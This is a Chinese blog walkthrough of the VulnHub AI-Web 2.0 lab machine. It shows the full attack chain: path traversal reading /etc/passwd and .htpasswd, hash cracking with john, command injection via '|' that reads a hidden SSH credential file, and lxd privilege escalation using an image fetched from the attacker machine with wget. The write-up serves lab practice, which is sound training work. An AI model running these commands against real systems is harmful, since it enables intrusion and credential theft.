ai-web2.0

最新推荐文章于 2024-07-25 10:08:48 发布
最新推荐文章于 2024-07-25 10:08:48 发布
阅读量194 收藏
点赞数 4
分类专栏: vulnhub 靶场练习 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longwanlian/article/details/134538849
版权

vulnhub靶场ai-web 2.0

配置环境 windows11 vmware 17.5 kali

靶机地址https://www.vulnhub.com/entry/ai-web-2,357/

image-20231120211538433

攻击机kali192.168.31.131

首先使用

arp-scan -l

探测目标ip地址

image-20231120211706884

发现目标ip地址为

192.168.31.134

使用nmap工具进行信息收集

nmap -T4 -sV -O -A -P //-T4(速度) -sV(版本扫描和开启的服务) -O(操作系统) -p(所有端口) ip

image-20231120211912626

可以发现开放22和80端口,推测为ssh和http服务

先浏览器瞅一眼

image-20231120212106360

先尝试admin等其他常见用户名登录无果

然后点击signup发现这是一个注册接口

image-20231120212213645

注册好username就可以直接进行登录,这里注册一个admin

image-20231120212309584

根据页面提示内容进行搜索

image-20231120212953211

image-20231120213020420

发现此为目录遍历漏洞

采用/download.php?file_name=…/etc/passwd的形式读取

image-20231120213334820

一点一点的尝试

…/…/…/…/…/etc/passwd

image-20231120213411362

根据之前信息收集的结果来看,服务器采用apache

所以尝试读取/etc/apache2/.htpasswd文件

image-20231120213957362

得到对应的hash密码

尝试使用工具破解

这里采用john工具进行破解,kali自带

github上的rockyou-45作为字典进行爆破https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt ,同时把hash密码存放在temp.txt中(自己建)

john --wordlist=rockyou-45.txt temp.txt

image-20231120214659301

再使用

john --show temp.txt

命令查看密码

image-20231120214754161

发现密码为c.ronaldo

尝试之前发现的ssh端口,发现不是ssh账号密码

之前采用过

dirb http://192.168.31.134/

目录爆破

image-20231120215000851

发现了一个页面

image-20231120215121112

尝试用刚刚收集到的账号密码

账号aiweb2admin 密码c.ronaldo

发现可以登录

image-20231120215232831

根据提示内容,得知还有robots页面

image-20231120215307497

发现新的目录

image-20231120215356221

ok命令执行

image-20231120215419837

经测试 可以使用|执行其他命令 这里输入为 | whomai

这里也尝试过bash反弹shell但是没有用,可能是做了限制

image-20231120215508900

采用find命令

|| find . -type f /var/www/html/webadmin/S0mextras

找寻网站下所有文件

image-20231121153409443

发现了sshUserCred55512.txt文件

cat看一下

|| cat /var/www/html/webadmin/S0mextras/.sshUserCred55512.txt

image-20231121153507358

ssh连接(windows10dos也可以连接,这里我采用xshelll)

image-20231121153620062

whoami,id查看权限

image-20231121153702787

发现用户也属于lxd组

想到了lxd提权

使用

find / -perm -u=s -type f 2>/dev/null

从根目录查找具有root权限的二进制文件

image-20231121154524864

刚好发现了lxc也存在root权限

image-20231121154627794

所以采用lxd提权

在kali机上制作镜像,使用kali的root权限

lxd提权借鉴于[lxd/lxc组提权 - hirak0 - 博客园 (cnblogs.com)](https://www.cnblogs.com/hirak0/p/16111530.html#:~:text=如果你属于 lxd 或 lxc 组,你可以利用这个进行提权,在没有互联网的情况下利用 方法一 您可以在您的机器上安装此发行版构建器: https%3A%2F%2Fgithub.com%2Flxc%2Fdistrobuilder(按照 github 的说明进行操作))

image-20231121155010081

我这边已经制作好镜像了

所以使用python -m http.server 自定义端口号

搭建vps

再使用靶机下载下来

wget -S http://192.168.31.131:8848/对应镜像

image-20231121185003711

此时已经是root权限了

使用find命令查找flag

find / -name flag*

image-20231121185731069

最后在来一首cat查看

总结:

​ 1、目录扫描

​ 2、目录遍历

​ 3、命令执行

​ 4、find命令

(img-iG6a9HfO-1700564874661)]

此时已经是root权限了

使用find命令查找flag

find / -name flag*

[外链图片转存中…(img-5S5e5d5A-1700564874662)]

最后在来一首cat查看

总结:

​ 1、目录扫描

​ 2、目录遍历

​ 3、命令执行

​ 4、find命令

​ 5、lxd提权

longersking
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次AI Web 2.0渗透测试过程
weixin_48840076的博客
09-19 328
目录 目录 2 1.基本概况 3 1.1 基本信息 3 1.2 渗透环境及工具 3 1.3 渗透目标 3 2.具体渗透过程 3 2.1 整体概况 3 2.2 详细过程 3 2.2.1 确定IP 3 2.2.2 信息收集 3 2.2.3 漏洞扫描 3 2.2.4 漏洞利用 4 2.2.5 提权 4 3.总结 4 致 谢 5 1.基本概况 1.1基本信息 当前服务器的基本信息:操作系...
AI-Web-2.0
底层社会中的弱智
08-08 755
小总结: 目录遍历漏洞常见的位置,例如在前端中看到某些image标签<img src=/images?file=png>,那么这里就可能存在任意文件读取漏洞。当时看到这个框架存在任意文件读取漏洞,我就在想如果没有其他漏洞可以进行组合利用,我如何最大化的利用任意文件读取? 那就是利用默认的配置路径进行配置信息的读取,尽可能多的获得配置信息。 所以在在即搭建网站的时候要修改默认的端口,默认的路径,默认的密码,这些都是潜在的危险。 判断中间件的版本信息然后根据对应版本信息的默认路径进行文件读取。
VulnHub靶机 - AI:Web 2.0
狂吃三碗
04-28 511
VulnHub靶机 - AI:Web 2.0
AI: Web: 2靶机-Walkthrough
ins1ght的博客
09-20 2266
AI: Web: 2靶机,中等难度靶机。目录爆破工具啊,漏扫工具啊每次还是多用几个,血的教训……
AI-WEB-2.0 靶机实录
gaopan2667002的博客
09-01 152
file_name=../../../../../../../../../../../../..//etc/apache2/.htpasswd获取到passwd文件。下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;这个文件告诉来访的搜索引擎哪些房间可以进入和参观,哪些房间因为存放贵重物品,或可能涉及住户及访客的隐私而不对搜索引擎开放。的内容时,才需要使用robots.txt文件。--从哪里获取到的这个apache文件的位置,为什么要获取该文件。
vulnhub靶场ai-web 2.0
weixin_45653478的博客
07-02 704
主机地址为192.168.1.4。
Ai-Bot2.0.zip
11-22
- AI-Bot可能是一个基于人工智能技术的聊天机器人,它可能使用了机器学习、自然语言处理(NLP)、语音识别和语义理解等技术。 - 机器学习:可能是通过深度学习模型如LSTM(长短期记忆网络)或Transformer进行对话...
H13-821 2.0题库.docx
07-20
- 学习华为云的安全产品和服务,如WAF(Web应用防火墙)、CS(安全中心)和Ddos防护。 - 理解国内外的数据合规性要求,如GDPR和等保2.0。 6. **网络与CDN服务**: - 掌握VPC的网络设计和路由策略,以及EIP(弹性...
新闻文章STCMS文章系统 v2.0-stcmsv2.0.rar
04-08
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
新闻文章浪子新闻系统 v2.0-31165php-cms2.0.rar
04-08
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8348
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
“微软蓝屏”事件暴露网络安全哪些问题
sheji888的专栏
07-23 359
微软蓝屏”事件是指2024年7月19日发生的一起全球性技术故障,主要涉及微软视窗(Windows)操作系统及其相关应用和服务。
微软蓝屏事件:网络安全的多维挑战与应对策略
sinner小屋
07-23 706
微软蓝屏事件,这一近期震动全球科技界的重大事件,起因于一次看似平常的软件更新。美国电脑安全技术公司“众击”发布的更新包中隐藏着一个致命的“缺陷”,这个缺陷如同潜伏的病毒,一旦被激活,便在全球范围内引发了连锁反应。近850万台设备,从个人电脑到关键行业的服务器,无一幸免地遭遇了系统崩溃,屏幕上只剩下一片冰冷的蓝色。这一事件不仅影响了日常办公,更是波及了航空、医疗、传媒等关键领域,造成了航班延误、医疗服务中断、信息传播受阻等一系列严重后果。
网络安全之初始访问阶段攻防手段(三)
最新发布
子非渔
07-25 773
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
网络安全】CrowdStrike 的 Falcon Sensor 软件导致 Linux 内核崩溃
par@ish的博客
07-22 1139
CrowdStrike的Falcon Sensor软件,上周导致大量Windows电脑出现蓝屏故障,现在还被发现Linux内核系统崩溃也与CrowdStrike有关。六月份,Red Hat警告其客户在使用版本为5.14.0-427.13.1.el9_4.x86_64的内核启动后,由Falcon Sensor进程引发的“Kernel panic”问题,影响了部分Red Hat Enterprise Linux 9.4用户。
网络安全等级保护制度1.0与2.0的演进与变革
gmqqcsdn的博客
07-23 671
等保1.0是我国在网络安全领域迈出的重要一步,它于2008年正式发布。该版本的等保制度以《信息安全技术 信息系统安全等级保护基本要求》为核心标准,主要聚焦于信息系统的物理安全网络安全、主机安全、应用安全和数据安全等方面的基础防护。等保1.0的实施对于提高我国信息系统的安全防护水平起到了积极的推动作用,但随着网络环境的快速变化和新型威胁的不断出现,等保1.0的局限性也逐渐显现。
“微软蓝屏”事件暴露了网络安全哪些问题?
csdn_aspnet的专栏
07-23 1131
这次由微软系统软件更新引发的“微软蓝屏”事件,无疑是对全球IT基础设施韧性与安全性的重大考验。850万台设备的故障,以及对航空、医疗和传媒等关键行业的广泛影响,再次突显出我们在网络安全和系统稳定性方面的脆弱性。一、问题解析1、更新管理的复杂性:随着技术的不断进步,软件更新的复杂性也在增加。大型系统中,需要兼顾各种硬件、软件和环境,确保更新不会引发兼容性问题,而这往往十分困难。2、供应链风险:如这次事件所示,一个小小的缺陷就可能通过供应链扩散,造成全球性影响。
【DVWA靶场】web安全漏洞-文件上传+文件包含(详细复现教程)
weixin_60838266的博客
07-21 1264
DVWA靶场漏洞复现之文件上传+文件包含。
java JSON-RPC 2.0 sslKey
04-06
I'm sorry, as an AI language model, I cannot provide information about a specific SSL key as it is confidential information and should only be accessed by authorized personnel. However, here is a brief explanation of JSON-RPC 2.0 and SSL. JSON-RPC 2.0 is a lightweight remote procedure call (RPC) protocol that uses JSON (JavaScript Object Notation) as a data format. It is commonly used in client-server communication in web applications. SSL (Secure Sockets Layer) is a protocol that provides secure communication over the internet by encrypting data transmitted between a client and a server. SSL uses digital certificates to authenticate the server and establish a secure connection. To use JSON-RPC 2.0 with SSL, a client needs to establish a secure connection by providing the SSL key or certificate to the server. The SSL key is used to encrypt and decrypt data transmitted between the client and server. This ensures that the data transmitted is secure and cannot be intercepted by unauthorized parties.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值